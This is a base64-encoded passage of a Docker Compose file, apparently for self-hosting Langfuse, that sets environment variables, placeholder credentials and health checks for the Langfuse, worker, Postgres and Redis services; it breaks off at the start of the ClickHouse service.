X0lEPSR7TEFOR0ZVU0VfUzNfTUVESUFfVVBMT0FEX0FDQ0VTU19LRVlfSUR9JwogIC0gJ0xBTkdGVVNFX1MzX01FRElBX1VQTE9BRF9TRUNSRVRfQUNDRVNTX0tFWT0ke0xBTkdGVVNFX1MzX01FRElBX1VQTE9BRF9TRUNSRVRfQUNDRVNTX0tFWX0nCiAgLSAnTEFOR0ZVU0VfUzNfTUVESUFfVVBMT0FEX0VORFBPSU5UPSR7TEFOR0ZVU0VfUzNfTUVESUFfVVBMT0FEX0VORFBPSU5UfScKICAtICdMQU5HRlVTRV9TM19NRURJQV9VUExPQURfRk9SQ0VfUEFUSF9TVFlMRT0ke0xBTkdGVVNFX1MzX01FRElBX1VQTE9BRF9GT1JDRV9QQVRIX1NUWUxFOi10cnVlfScKICAtICdMQU5HRlVTRV9TM19NRURJQV9VUExPQURfUFJFRklYPSR7TEFOR0ZVU0VfUzNfTUVESUFfVVBMT0FEX1BSRUZJWDotbWVkaWEvfScKICAtICdMQU5HRlVTRV9TM19CQVRDSF9FWFBPUlRfRU5BQkxFRD0ke0xBTkdGVVNFX1MzX0JBVENIX0VYUE9SVF9FTkFCTEVEOi1mYWxzZX0nCiAgLSAnTEFOR0ZVU0VfUzNfQkFUQ0hfRVhQT1JUX0JVQ0tFVD0ke0xBTkdGVVNFX1MzX0JBVENIX0VYUE9SVF9CVUNLRVQ6LWxhbmdmdXNlfScKICAtICdMQU5HRlVTRV9TM19CQVRDSF9FWFBPUlRfUFJFRklYPSR7TEFOR0ZVU0VfUzNfQkFUQ0hfRVhQT1JUX1BSRUZJWDotZXhwb3J0cy99JwogIC0gJ0xBTkdGVVNFX1MzX0JBVENIX0VYUE9SVF9SRUdJT049JHtMQU5HRlVTRV9TM19CQVRDSF9FWFBPUlRfUkVHSU9OOi1hdXRvfScKICAtICdMQU5HRlVTRV9TM19CQVRDSF9FWFBPUlRfRU5EUE9JTlQ9JHtMQU5HRlVTRV9TM19CQVRDSF9FWFBPUlRfRU5EUE9JTlR9JwogIC0gJ0xBTkdGVVNFX1MzX0JBVENIX0VYUE9SVF9FWFRFUk5BTF9FTkRQT0lOVD0ke0xBTkdGVVNFX1MzX0JBVENIX0VYUE9SVF9FWFRFUk5BTF9FTkRQT0lOVH0nCiAgLSAnTEFOR0ZVU0VfUzNfQkFUQ0hfRVhQT1JUX0FDQ0VTU19LRVlfSUQ9JHtMQU5HRlVTRV9TM19CQVRDSF9FWFBPUlRfQUNDRVNTX0tFWV9JRH0nCiAgLSAnTEFOR0ZVU0VfUzNfQkFUQ0hfRVhQT1JUX1NFQ1JFVF9BQ0NFU1NfS0VZPSR7TEFOR0ZVU0VfUzNfQkFUQ0hfRVhQT1JUX1NFQ1JFVF9BQ0NFU1NfS0VZfScKICAtICdMQU5HRlVTRV9TM19CQVRDSF9FWFBPUlRfRk9SQ0VfUEFUSF9TVFlMRT0ke0xBTkdGVVNFX1MzX0JBVENIX0VYUE9SVF9GT1JDRV9QQVRIX1NUWUxFOi10cnVlfScKICAtICdMQU5HRlVTRV9JTkdFU1RJT05fUVVFVUVfREVMQVlfTVM9JHtMQU5HRlVTRV9JTkdFU1RJT05fUVVFVUVfREVMQVlfTVM6LTF9JwogIC0gJ0xBTkdGVVNFX0lOR0VTVElPTl9DTElDS0hPVVNFX1dSSVRFX0lOVEVSVkFMX01TPSR7TEFOR0ZVU0VfSU5HRVNUSU9OX0NMSUNLSE9VU0VfV1JJVEVfSU5URVJWQUxfTVM6LTEwMDB9JwogIC0gUkVESVNfSE9TVD1yZWRpcwogIC0gUkVESVNfUE9SVD02Mzc5CiAgLSAnUkVESVNfQVVUSD0ke1NFUlZJQ0VfUEFTU1dPUkRfUkVESVN9JwogIC0gJ0VNQUlMX0ZST01fQUREUkVTUz0ke0VNQUlMX0ZST01fQUREUkVTUzotYWRtaW5AZXhhbXBsZS5jb219JwogIC0gJ1NNVFBfQ09OTkVDVElPTl9VUkw9JHtTTVRQX0NPTk5FQ1RJT05fVVJMOi19JwogIC0gJ05FWFRBVVRIX1NFQ1JFVD0ke1NFUlZJQ0VfQkFTRTY0X05FWFRBVVRIU0VDUkVUfScKICAtICdBVVRIX0RJU0FCTEVfU0lHTlVQPSR7QVVUSF9ESVNBQkxFX1NJR05VUDotdHJ1ZX0nCiAgLSAnSE9TVE5BTUU9JHtIT1NUTkFNRTotMC4wLjAuMH0nCiAgLSAnTEFOR0ZVU0VfSU5JVF9PUkdfSUQ9JHtMQU5HRlVTRV9JTklUX09SR19JRDotbXktb3JnfScKICAtICdMQU5HRlVTRV9JTklUX09SR19OQU1FPSR7TEFOR0ZVU0VfSU5JVF9PUkdfTkFNRTotTXkgT3JnfScKICAtICdMQU5HRlVTRV9JTklUX1BST0pFQ1RfSUQ9JHtMQU5HRlVTRV9JTklUX1BST0pFQ1RfSUQ6LW15LXByb2plY3R9JwogIC0gJ0xBTkdGVVNFX0lOSVRfUFJPSkVDVF9OQU1FPSR7TEFOR0ZVU0VfSU5JVF9QUk9KRUNUX05BTUU6LU15IFByb2plY3R9JwogIC0gJ0xBTkdGVVNFX0lOSVRfVVNFUl9FTUFJTD0ke0xBTkdGVVNFX0lOSVRfVVNFUl9FTUFJTDotYWRtaW5AZXhhbXBsZS5jb219JwogIC0gJ0xBTkdGVVNFX0lOSVRfVVNFUl9OQU1FPSR7U0VSVklDRV9VU0VSX0xBTkdGVVNFfScKICAtICdMQU5HRlVTRV9JTklUX1VTRVJfUEFTU1dPUkQ9JHtTRVJWSUNFX1BBU1NXT1JEX0xBTkdGVVNFfScKc2VydmljZXM6CiAgbGFuZ2Z1c2U6CiAgICBpbWFnZTogJ2xhbmdmdXNlL2xhbmdmdXNlOjMnCiAgICBkZXBlbmRzX29uOgogICAgICBwb3N0Z3JlczoKICAgICAgICBjb25kaXRpb246IHNlcnZpY2VfaGVhbHRoeQogICAgICByZWRpczoKICAgICAgICBjb25kaXRpb246IHNlcnZpY2VfaGVhbHRoeQogICAgICBjbGlja2hvdXNlOgogICAgICAgIGNvbmRpdGlvbjogc2VydmljZV9oZWFsdGh5CiAgICBlbnZpcm9ubWVudDoKICAgICAgMDogJ05FWFRBVVRIX1VSTD0ke1NFUlZJQ0VfVVJMX0xBTkdGVVNFfScKICAgICAgMTogJ0RBVEFCQVNFX1VSTD1wb3N0Z3Jlc3FsOi8vJHtTRVJWSUNFX1VTRVJfUE9TVEdSRVN9OiR7U0VSVklDRV9QQVNTV09SRF9QT1NUR1JFU31AcG9zdGdyZXM6NTQzMi8ke1BPU1RHUkVTX0RCOi1sYW5nZnVzZS1kYn0nCiAgICAgIDI6ICdTQUxUPSR7U0VSVklDRV9QQVNTV09SRF9TQUxUfScKICAgICAgMzogJ0VOQ1JZUFRJT05fS0VZPSR7U0VSVklDRV9QQVNTV09SRF82NF9MQU5HRlVTRX0nCiAgICAgIDQ6ICdURUxFTUVUUllfRU5BQkxFRD0ke1RFTEVNRVRSWV9FTkFCTEVEOi1mYWxzZX0nCiAgICAgIDU6ICdMQU5HRlVTRV9FTkFCTEVfRVhQRVJJTUVOVEFMX0ZFQVRVUkVTPSR7TEFOR0ZVU0VfRU5BQkxFX0VYUEVSSU1FTlRBTF9GRUFUVVJFUzotZmFsc2V9JwogICAgICA2OiAnQ0xJQ0tIT1VTRV9NSUdSQVRJT05fVVJMPWNsaWNraG91c2U6Ly9jbGlja2hvdXNlOjkwMDAnCiAgICAgIDc6ICdDTElDS0hPVVNFX1VSTD1odHRwOi8vY2xpY2tob3VzZTo4MTIzJwogICAgICA4OiAnQ0xJQ0tIT1VTRV9VU0VSPSR7U0VSVklDRV9VU0VSX0NMSUNLSE9VU0V9JwogICAgICA5OiAnQ0xJQ0tIT1VTRV9QQVNTV09SRD0ke1NFUlZJQ0VfUEFTU1dPUkRfQ0xJQ0tIT1VTRX0nCiAgICAgIDEwOiBDTElDS0hPVVNFX0NMVVNURVJfRU5BQkxFRD1mYWxzZQogICAgICAxMTogJ0xBTkdGVVNFX1VTRV9BWlVSRV9CTE9CPSR7TEFOR0ZVU0VfVVNFX0FaVVJFX0JMT0I6LWZhbHNlfScKICAgICAgMTI6ICdMQU5HRlVTRV9TM19FVkVOVF9VUExPQURfQlVDS0VUPSR7TEFOR0ZVU0VfUzNfRVZFTlRfVVBMT0FEX0JVQ0tFVDotbGFuZ2Z1c2V9JwogICAgICAxMzogJ0xBTkdGVVNFX1MzX0VWRU5UX1VQTE9BRF9SRUdJT049JHtMQU5HRlVTRV9TM19FVkVOVF9VUExPQURfUkVHSU9OOi1hdXRvfScKICAgICAgMTQ6ICdMQU5HRlVTRV9TM19FVkVOVF9VUExPQURfQUNDRVNTX0tFWV9JRD0ke0xBTkdGVVNFX1MzX0VWRU5UX1VQTE9BRF9BQ0NFU1NfS0VZX0lEfScKICAgICAgMTU6ICdMQU5HRlVTRV9TM19FVkVOVF9VUExPQURfU0VDUkVUX0FDQ0VTU19LRVk9JHtMQU5HRlVTRV9TM19FVkVOVF9VUExPQURfU0VDUkVUX0FDQ0VTU19LRVl9JwogICAgICAxNjogJ0xBTkdGVVNFX1MzX0VWRU5UX1VQTE9BRF9FTkRQT0lOVD0ke0xBTkdGVVNFX1MzX0VWRU5UX1VQTE9BRF9FTkRQT0lOVH0nCiAgICAgIDE3OiAnTEFOR0ZVU0VfUzNfRVZFTlRfVVBMT0FEX0ZPUkNFX1BBVEhfU1RZTEU9JHtMQU5HRlVTRV9TM19FVkVOVF9VUExPQURfRk9SQ0VfUEFUSF9TVFlMRTotdHJ1ZX0nCiAgICAgIDE4OiAnTEFOR0ZVU0VfUzNfRVZFTlRfVVBMT0FEX1BSRUZJWD0ke0xBTkdGVVNFX1MzX0VWRU5UX1VQTE9BRF9QUkVGSVg6LWV2ZW50cy99JwogICAgICAxOTogJ0xBTkdGVVNFX1MzX01FRElBX1VQTE9BRF9CVUNLRVQ9JHtMQU5HRlVTRV9TM19NRURJQV9VUExPQURfQlVDS0VUOi1sYW5nZnVzZX0nCiAgICAgIDIwOiAnTEFOR0ZVU0VfUzNfTUVESUFfVVBMT0FEX1JFR0lPTj0ke0xBTkdGVVNFX1MzX01FRElBX1VQTE9BRF9SRUdJT046LWF1dG99JwogICAgICAyMTogJ0xBTkdGVVNFX1MzX01FRElBX1VQTE9BRF9BQ0NFU1NfS0VZX0lEPSR7TEFOR0ZVU0VfUzNfTUVESUFfVVBMT0FEX0FDQ0VTU19LRVlfSUR9JwogICAgICAyMjogJ0xBTkdGVVNFX1MzX01FRElBX1VQTE9BRF9TRUNSRVRfQUNDRVNTX0tFWT0ke0xBTkdGVVNFX1MzX01FRElBX1VQTE9BRF9TRUNSRVRfQUNDRVNTX0tFWX0nCiAgICAgIDIzOiAnTEFOR0ZVU0VfUzNfTUVESUFfVVBMT0FEX0VORFBPSU5UPSR7TEFOR0ZVU0VfUzNfTUVESUFfVVBMT0FEX0VORFBPSU5UfScKICAgICAgMjQ6ICdMQU5HRlVTRV9TM19NRURJQV9VUExPQURfRk9SQ0VfUEFUSF9TVFlMRT0ke0xBTkdGVVNFX1MzX01FRElBX1VQTE9BRF9GT1JDRV9QQVRIX1NUWUxFOi10cnVlfScKICAgICAgMjU6ICdMQU5HRlVTRV9TM19NRURJQV9VUExPQURfUFJFRklYPSR7TEFOR0ZVU0VfUzNfTUVESUFfVVBMT0FEX1BSRUZJWDotbWVkaWEvfScKICAgICAgMjY6ICdMQU5HRlVTRV9TM19CQVRDSF9FWFBPUlRfRU5BQkxFRD0ke0xBTkdGVVNFX1MzX0JBVENIX0VYUE9SVF9FTkFCTEVEOi1mYWxzZX0nCiAgICAgIDI3OiAnTEFOR0ZVU0VfUzNfQkFUQ0hfRVhQT1JUX0JVQ0tFVD0ke0xBTkdGVVNFX1MzX0JBVENIX0VYUE9SVF9CVUNLRVQ6LWxhbmdmdXNlfScKICAgICAgMjg6ICdMQU5HRlVTRV9TM19CQVRDSF9FWFBPUlRfUFJFRklYPSR7TEFOR0ZVU0VfUzNfQkFUQ0hfRVhQT1JUX1BSRUZJWDotZXhwb3J0cy99JwogICAgICAyOTogJ0xBTkdGVVNFX1MzX0JBVENIX0VYUE9SVF9SRUdJT049JHtMQU5HRlVTRV9TM19CQVRDSF9FWFBPUlRfUkVHSU9OOi1hdXRvfScKICAgICAgMzA6ICdMQU5HRlVTRV9TM19CQVRDSF9FWFBPUlRfRU5EUE9JTlQ9JHtMQU5HRlVTRV9TM19CQVRDSF9FWFBPUlRfRU5EUE9JTlR9JwogICAgICAzMTogJ0xBTkdGVVNFX1MzX0JBVENIX0VYUE9SVF9FWFRFUk5BTF9FTkRQT0lOVD0ke0xBTkdGVVNFX1MzX0JBVENIX0VYUE9SVF9FWFRFUk5BTF9FTkRQT0lOVH0nCiAgICAgIDMyOiAnTEFOR0ZVU0VfUzNfQkFUQ0hfRVhQT1JUX0FDQ0VTU19LRVlfSUQ9JHtMQU5HRlVTRV9TM19CQVRDSF9FWFBPUlRfQUNDRVNTX0tFWV9JRH0nCiAgICAgIDMzOiAnTEFOR0ZVU0VfUzNfQkFUQ0hfRVhQT1JUX1NFQ1JFVF9BQ0NFU1NfS0VZPSR7TEFOR0ZVU0VfUzNfQkFUQ0hfRVhQT1JUX1NFQ1JFVF9BQ0NFU1NfS0VZfScKICAgICAgMzQ6ICdMQU5HRlVTRV9TM19CQVRDSF9FWFBPUlRfRk9SQ0VfUEFUSF9TVFlMRT0ke0xBTkdGVVNFX1MzX0JBVENIX0VYUE9SVF9GT1JDRV9QQVRIX1NUWUxFOi10cnVlfScKICAgICAgMzU6ICdMQU5HRlVTRV9JTkdFU1RJT05fUVVFVUVfREVMQVlfTVM9JHtMQU5HRlVTRV9JTkdFU1RJT05fUVVFVUVfREVMQVlfTVM6LTF9JwogICAgICAzNjogJ0xBTkdGVVNFX0lOR0VTVElPTl9DTElDS0hPVVNFX1dSSVRFX0lOVEVSVkFMX01TPSR7TEFOR0ZVU0VfSU5HRVNUSU9OX0NMSUNLSE9VU0VfV1JJVEVfSU5URVJWQUxfTVM6LTEwMDB9JwogICAgICAzNzogUkVESVNfSE9TVD1yZWRpcwogICAgICAzODogUkVESVNfUE9SVD02Mzc5CiAgICAgIDM5OiAnUkVESVNfQVVUSD0ke1NFUlZJQ0VfUEFTU1dPUkRfUkVESVN9JwogICAgICA0MDogJ0VNQUlMX0ZST01fQUREUkVTUz0ke0VNQUlMX0ZST01fQUREUkVTUzotYWRtaW5AZXhhbXBsZS5jb219JwogICAgICA0MTogJ1NNVFBfQ09OTkVDVElPTl9VUkw9JHtTTVRQX0NPTk5FQ1RJT05fVVJMOi19JwogICAgICA0MjogJ05FWFRBVVRIX1NFQ1JFVD0ke1NFUlZJQ0VfQkFTRTY0X05FWFRBVVRIU0VDUkVUfScKICAgICAgNDM6ICdBVVRIX0RJU0FCTEVfU0lHTlVQPSR7QVVUSF9ESVNBQkxFX1NJR05VUDotdHJ1ZX0nCiAgICAgIDQ0OiAnSE9TVE5BTUU9JHtIT1NUTkFNRTotMC4wLjAuMH0nCiAgICAgIDQ1OiAnTEFOR0ZVU0VfSU5JVF9PUkdfSUQ9JHtMQU5HRlVTRV9JTklUX09SR19JRDotbXktb3JnfScKICAgICAgNDY6ICdMQU5HRlVTRV9JTklUX09SR19OQU1FPSR7TEFOR0ZVU0VfSU5JVF9PUkdfTkFNRTotTXkgT3JnfScKICAgICAgNDc6ICdMQU5HRlVTRV9JTklUX1BST0pFQ1RfSUQ9JHtMQU5HRlVTRV9JTklUX1BST0pFQ1RfSUQ6LW15LXByb2plY3R9JwogICAgICA0ODogJ0xBTkdGVVNFX0lOSVRfUFJPSkVDVF9OQU1FPSR7TEFOR0ZVU0VfSU5JVF9QUk9KRUNUX05BTUU6LU15IFByb2plY3R9JwogICAgICA0OTogJ0xBTkdGVVNFX0lOSVRfVVNFUl9FTUFJTD0ke0xBTkdGVVNFX0lOSVRfVVNFUl9FTUFJTDotYWRtaW5AZXhhbXBsZS5jb219JwogICAgICA1MDogJ0xBTkdGVVNFX0lOSVRfVVNFUl9OQU1FPSR7U0VSVklDRV9VU0VSX0xBTkdGVVNFfScKICAgICAgNTE6ICdMQU5HRlVTRV9JTklUX1VTRVJfUEFTU1dPUkQ9JHtTRVJWSUNFX1BBU1NXT1JEX0xBTkdGVVNFfScKICAgICAgU0VSVklDRV9VUkxfTEFOR0ZVU0VfMzAwMDogJyR7U0VSVklDRV9VUkxfTEFOR0ZVU0VfMzAwMH0nCiAgICBoZWFsdGhjaGVjazoKICAgICAgdGVzdDoKICAgICAgICAtIENNRAogICAgICAgIC0gd2dldAogICAgICAgIC0gJy1xJwogICAgICAgIC0gJy0tc3BpZGVyJwogICAgICAgIC0gJ2h0dHA6Ly8xMjcuMC4wLjE6MzAwMC9hcGkvcHVibGljL2hlYWx0aCcKICAgICAgaW50ZXJ2YWw6IDVzCiAgICAgIHRpbWVvdXQ6IDVzCiAgICAgIHJldHJpZXM6IDMKICBsYW5nZnVzZS13b3JrZXI6CiAgICBpbWFnZTogJ2xhbmdmdXNlL2xhbmdmdXNlLXdvcmtlcjozJwogICAgZW52aXJvbm1lbnQ6CiAgICAgIC0gJ05FWFRBVVRIX1VSTD0ke1NFUlZJQ0VfVVJMX0xBTkdGVVNFfScKICAgICAgLSAnREFUQUJBU0VfVVJMPXBvc3RncmVzcWw6Ly8ke1NFUlZJQ0VfVVNFUl9QT1NUR1JFU306JHtTRVJWSUNFX1BBU1NXT1JEX1BPU1RHUkVTfUBwb3N0Z3Jlczo1NDMyLyR7UE9TVEdSRVNfREI6LWxhbmdmdXNlLWRifScKICAgICAgLSAnU0FMVD0ke1NFUlZJQ0VfUEFTU1dPUkRfU0FMVH0nCiAgICAgIC0gJ0VOQ1JZUFRJT05fS0VZPSR7U0VSVklDRV9QQVNTV09SRF82NF9MQU5HRlVTRX0nCiAgICAgIC0gJ1RFTEVNRVRSWV9FTkFCTEVEPSR7VEVMRU1FVFJZX0VOQUJMRUQ6LWZhbHNlfScKICAgICAgLSAnTEFOR0ZVU0VfRU5BQkxFX0VYUEVSSU1FTlRBTF9GRUFUVVJFUz0ke0xBTkdGVVNFX0VOQUJMRV9FWFBFUklNRU5UQUxfRkVBVFVSRVM6LWZhbHNlfScKICAgICAgLSAnQ0xJQ0tIT1VTRV9NSUdSQVRJT05fVVJMPWNsaWNraG91c2U6Ly9jbGlja2hvdXNlOjkwMDAnCiAgICAgIC0gJ0NMSUNLSE9VU0VfVVJMPWh0dHA6Ly9jbGlja2hvdXNlOjgxMjMnCiAgICAgIC0gJ0NMSUNLSE9VU0VfVVNFUj0ke1NFUlZJQ0VfVVNFUl9DTElDS0hPVVNFfScKICAgICAgLSAnQ0xJQ0tIT1VTRV9QQVNTV09SRD0ke1NFUlZJQ0VfUEFTU1dPUkRfQ0xJQ0tIT1VTRX0nCiAgICAgIC0gQ0xJQ0tIT1VTRV9DTFVTVEVSX0VOQUJMRUQ9ZmFsc2UKICAgICAgLSAnTEFOR0ZVU0VfVVNFX0FaVVJFX0JMT0I9JHtMQU5HRlVTRV9VU0VfQVpVUkVfQkxPQjotZmFsc2V9JwogICAgICAtICdMQU5HRlVTRV9TM19FVkVOVF9VUExPQURfQlVDS0VUPSR7TEFOR0ZVU0VfUzNfRVZFTlRfVVBMT0FEX0JVQ0tFVDotbGFuZ2Z1c2V9JwogICAgICAtICdMQU5HRlVTRV9TM19FVkVOVF9VUExPQURfUkVHSU9OPSR7TEFOR0ZVU0VfUzNfRVZFTlRfVVBMT0FEX1JFR0lPTjotYXV0b30nCiAgICAgIC0gJ0xBTkdGVVNFX1MzX0VWRU5UX1VQTE9BRF9BQ0NFU1NfS0VZX0lEPSR7TEFOR0ZVU0VfUzNfRVZFTlRfVVBMT0FEX0FDQ0VTU19LRVlfSUR9JwogICAgICAtICdMQU5HRlVTRV9TM19FVkVOVF9VUExPQURfU0VDUkVUX0FDQ0VTU19LRVk9JHtMQU5HRlVTRV9TM19FVkVOVF9VUExPQURfU0VDUkVUX0FDQ0VTU19LRVl9JwogICAgICAtICdMQU5HRlVTRV9TM19FVkVOVF9VUExPQURfRU5EUE9JTlQ9JHtMQU5HRlVTRV9TM19FVkVOVF9VUExPQURfRU5EUE9JTlR9JwogICAgICAtICdMQU5HRlVTRV9TM19FVkVOVF9VUExPQURfRk9SQ0VfUEFUSF9TVFlMRT0ke0xBTkdGVVNFX1MzX0VWRU5UX1VQTE9BRF9GT1JDRV9QQVRIX1NUWUxFOi10cnVlfScKICAgICAgLSAnTEFOR0ZVU0VfUzNfRVZFTlRfVVBMT0FEX1BSRUZJWD0ke0xBTkdGVVNFX1MzX0VWRU5UX1VQTE9BRF9QUkVGSVg6LWV2ZW50cy99JwogICAgICAtICdMQU5HRlVTRV9TM19NRURJQV9VUExPQURfQlVDS0VUPSR7TEFOR0ZVU0VfUzNfTUVESUFfVVBMT0FEX0JVQ0tFVDotbGFuZ2Z1c2V9JwogICAgICAtICdMQU5HRlVTRV9TM19NRURJQV9VUExPQURfUkVHSU9OPSR7TEFOR0ZVU0VfUzNfTUVESUFfVVBMT0FEX1JFR0lPTjotYXV0b30nCiAgICAgIC0gJ0xBTkdGVVNFX1MzX01FRElBX1VQTE9BRF9BQ0NFU1NfS0VZX0lEPSR7TEFOR0ZVU0VfUzNfTUVESUFfVVBMT0FEX0FDQ0VTU19LRVlfSUR9JwogICAgICAtICdMQU5HRlVTRV9TM19NRURJQV9VUExPQURfU0VDUkVUX0FDQ0VTU19LRVk9JHtMQU5HRlVTRV9TM19NRURJQV9VUExPQURfU0VDUkVUX0FDQ0VTU19LRVl9JwogICAgICAtICdMQU5HRlVTRV9TM19NRURJQV9VUExPQURfRU5EUE9JTlQ9JHtMQU5HRlVTRV9TM19NRURJQV9VUExPQURfRU5EUE9JTlR9JwogICAgICAtICdMQU5HRlVTRV9TM19NRURJQV9VUExPQURfRk9SQ0VfUEFUSF9TVFlMRT0ke0xBTkdGVVNFX1MzX01FRElBX1VQTE9BRF9GT1JDRV9QQVRIX1NUWUxFOi10cnVlfScKICAgICAgLSAnTEFOR0ZVU0VfUzNfTUVESUFfVVBMT0FEX1BSRUZJWD0ke0xBTkdGVVNFX1MzX01FRElBX1VQTE9BRF9QUkVGSVg6LW1lZGlhL30nCiAgICAgIC0gJ0xBTkdGVVNFX1MzX0JBVENIX0VYUE9SVF9FTkFCTEVEPSR7TEFOR0ZVU0VfUzNfQkFUQ0hfRVhQT1JUX0VOQUJMRUQ6LWZhbHNlfScKICAgICAgLSAnTEFOR0ZVU0VfUzNfQkFUQ0hfRVhQT1JUX0JVQ0tFVD0ke0xBTkdGVVNFX1MzX0JBVENIX0VYUE9SVF9CVUNLRVQ6LWxhbmdmdXNlfScKICAgICAgLSAnTEFOR0ZVU0VfUzNfQkFUQ0hfRVhQT1JUX1BSRUZJWD0ke0xBTkdGVVNFX1MzX0JBVENIX0VYUE9SVF9QUkVGSVg6LWV4cG9ydHMvfScKICAgICAgLSAnTEFOR0ZVU0VfUzNfQkFUQ0hfRVhQT1JUX1JFR0lPTj0ke0xBTkdGVVNFX1MzX0JBVENIX0VYUE9SVF9SRUdJT046LWF1dG99JwogICAgICAtICdMQU5HRlVTRV9TM19CQVRDSF9FWFBPUlRfRU5EUE9JTlQ9JHtMQU5HRlVTRV9TM19CQVRDSF9FWFBPUlRfRU5EUE9JTlR9JwogICAgICAtICdMQU5HRlVTRV9TM19CQVRDSF9FWFBPUlRfRVhURVJOQUxfRU5EUE9JTlQ9JHtMQU5HRlVTRV9TM19CQVRDSF9FWFBPUlRfRVhURVJOQUxfRU5EUE9JTlR9JwogICAgICAtICdMQU5HRlVTRV9TM19CQVRDSF9FWFBPUlRfQUNDRVNTX0tFWV9JRD0ke0xBTkdGVVNFX1MzX0JBVENIX0VYUE9SVF9BQ0NFU1NfS0VZX0lEfScKICAgICAgLSAnTEFOR0ZVU0VfUzNfQkFUQ0hfRVhQT1JUX1NFQ1JFVF9BQ0NFU1NfS0VZPSR7TEFOR0ZVU0VfUzNfQkFUQ0hfRVhQT1JUX1NFQ1JFVF9BQ0NFU1NfS0VZfScKICAgICAgLSAnTEFOR0ZVU0VfUzNfQkFUQ0hfRVhQT1JUX0ZPUkNFX1BBVEhfU1RZTEU9JHtMQU5HRlVTRV9TM19CQVRDSF9FWFBPUlRfRk9SQ0VfUEFUSF9TVFlMRTotdHJ1ZX0nCiAgICAgIC0gJ0xBTkdGVVNFX0lOR0VTVElPTl9RVUVVRV9ERUxBWV9NUz0ke0xBTkdGVVNFX0lOR0VTVElPTl9RVUVVRV9ERUxBWV9NUzotMX0nCiAgICAgIC0gJ0xBTkdGVVNFX0lOR0VTVElPTl9DTElDS0hPVVNFX1dSSVRFX0lOVEVSVkFMX01TPSR7TEFOR0ZVU0VfSU5HRVNUSU9OX0NMSUNLSE9VU0VfV1JJVEVfSU5URVJWQUxfTVM6LTEwMDB9JwogICAgICAtIFJFRElTX0hPU1Q9cmVkaXMKICAgICAgLSBSRURJU19QT1JUPTYzNzkKICAgICAgLSAnUkVESVNfQVVUSD0ke1NFUlZJQ0VfUEFTU1dPUkRfUkVESVN9JwogICAgICAtICdFTUFJTF9GUk9NX0FERFJFU1M9JHtFTUFJTF9GUk9NX0FERFJFU1M6LWFkbWluQGV4YW1wbGUuY29tfScKICAgICAgLSAnU01UUF9DT05ORUNUSU9OX1VSTD0ke1NNVFBfQ09OTkVDVElPTl9VUkw6LX0nCiAgICAgIC0gJ05FWFRBVVRIX1NFQ1JFVD0ke1NFUlZJQ0VfQkFTRTY0X05FWFRBVVRIU0VDUkVUfScKICAgICAgLSAnQVVUSF9ESVNBQkxFX1NJR05VUD0ke0FVVEhfRElTQUJMRV9TSUdOVVA6LXRydWV9JwogICAgICAtICdIT1NUTkFNRT0ke0hPU1ROQU1FOi0wLjAuMC4wfScKICAgICAgLSAnTEFOR0ZVU0VfSU5JVF9PUkdfSUQ9JHtMQU5HRlVTRV9JTklUX09SR19JRDotbXktb3JnfScKICAgICAgLSAnTEFOR0ZVU0VfSU5JVF9PUkdfTkFNRT0ke0xBTkdGVVNFX0lOSVRfT1JHX05BTUU6LU15IE9yZ30nCiAgICAgIC0gJ0xBTkdGVVNFX0lOSVRfUFJPSkVDVF9JRD0ke0xBTkdGVVNFX0lOSVRfUFJPSkVDVF9JRDotbXktcHJvamVjdH0nCiAgICAgIC0gJ0xBTkdGVVNFX0lOSVRfUFJPSkVDVF9OQU1FPSR7TEFOR0ZVU0VfSU5JVF9QUk9KRUNUX05BTUU6LU15IFByb2plY3R9JwogICAgICAtICdMQU5HRlVTRV9JTklUX1VTRVJfRU1BSUw9JHtMQU5HRlVTRV9JTklUX1VTRVJfRU1BSUw6LWFkbWluQGV4YW1wbGUuY29tfScKICAgICAgLSAnTEFOR0ZVU0VfSU5JVF9VU0VSX05BTUU9JHtTRVJWSUNFX1VTRVJfTEFOR0ZVU0V9JwogICAgICAtICdMQU5HRlVTRV9JTklUX1VTRVJfUEFTU1dPUkQ9JHtTRVJWSUNFX1BBU1NXT1JEX0xBTkdGVVNFfScKICAgIGRlcGVuZHNfb246CiAgICAgIHBvc3RncmVzOgogICAgICAgIGNvbmRpdGlvbjogc2VydmljZV9oZWFsdGh5CiAgICAgIHJlZGlzOgogICAgICAgIGNvbmRpdGlvbjogc2VydmljZV9oZWFsdGh5CiAgICAgIGNsaWNraG91c2U6CiAgICAgICAgY29uZGl0aW9uOiBzZXJ2aWNlX2hlYWx0aHkKICBwb3N0Z3JlczoKICAgIGltYWdlOiAncG9zdGdyZXM6MTctYWxwaW5lJwogICAgZW52aXJvbm1lbnQ6CiAgICAgIC0gJ1BPU1RHUkVTX0RCPSR7UE9TVEdSRVNfREI6LWxhbmdmdXNlLWRifScKICAgICAgLSAnUE9TVEdSRVNfUEFTU1dPUkQ9JHtTRVJWSUNFX1BBU1NXT1JEX1BPU1RHUkVTfScKICAgICAgLSAnUE9TVEdSRVNfVVNFUj0ke1NFUlZJQ0VfVVNFUl9QT1NUR1JFU30nCiAgICB2b2x1bWVzOgogICAgICAtICdsYW5nZnVzZV9wb3N0Z3Jlc19kYXRhOi92YXIvbGliL3Bvc3RncmVzcWwvZGF0YScKICAgIGhlYWx0aGNoZWNrOgogICAgICB0ZXN0OgogICAgICAgIC0gQ01ELVNIRUxMCiAgICAgICAgLSAncGdfaXNyZWFkeSAtaCBsb2NhbGhvc3QgLVUgJCR7UE9TVEdSRVNfVVNFUn0gLWQgJCR7UE9TVEdSRVNfREJ9JwogICAgICBpbnRlcnZhbDogNXMKICAgICAgdGltZW91dDogNXMKICAgICAgcmV0cmllczogMTAKICByZWRpczoKICAgIGltYWdlOiAncmVkaXM6OCcKICAgIGNvbW1hbmQ6CiAgICAgIC0gc2gKICAgICAgLSAnLWMnCiAgICAgIC0gJ3JlZGlzLXNlcnZlciAtLXJlcXVpcmVwYXNzICIkU0VSVklDRV9QQVNTV09SRF9SRURJUyInCiAgICBlbnZpcm9ubWVudDoKICAgICAgLSAnUkVESVNfUEFTU1dPUkQ9JHtTRVJWSUNFX1BBU1NXT1JEX1JFRElTfScKICAgIHZvbHVtZXM6CiAgICAgIC0gJ2xhbmdmdXNlX3JlZGlzX2RhdGE6L2RhdGEnCiAgICBoZWFsdGhjaGVjazoKICAgICAgdGVzdDoKICAgICAgICAtIENNRAogICAgICAgIC0gcmVkaXMtY2xpCiAgICAgICAgLSAnLWEnCiAgICAgICAgLSAkU0VSVklDRV9QQVNTV09SRF9SRURJUwogICAgICAgIC0gUElORwogICAgICBpbnRlcnZhbDogM3MKICAgICAgdGltZW91dDogMTBzCiAgICAgIHJldHJpZXM6IDEwCiAgY2xpY2tob3VzZToKICAgIGltYWdlOiAnY2xpY